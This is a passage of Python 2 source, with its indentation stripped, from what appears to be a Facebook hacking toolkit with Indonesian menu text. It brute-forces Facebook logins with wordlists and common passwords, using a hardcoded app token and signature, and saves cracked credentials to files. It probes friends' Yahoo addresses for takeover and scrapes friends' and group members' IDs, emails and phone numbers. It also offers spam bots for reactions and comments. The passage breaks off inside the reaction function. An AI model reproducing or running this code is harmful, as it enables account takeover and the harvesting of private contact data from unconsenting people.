print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass5
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass5
else:
pass6 = ('sayangku')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass6
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass6
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mAre you sure want to make wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mnot found'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
                print '\x1b[1;91m[!] Not friends with this ID'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
            print '\x1b[1;91m[!] Failed to create file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
        print '\x1b[1;91m[!] Can\'t be empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
        print '\x1b[1;91m[!] Can\'t be empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
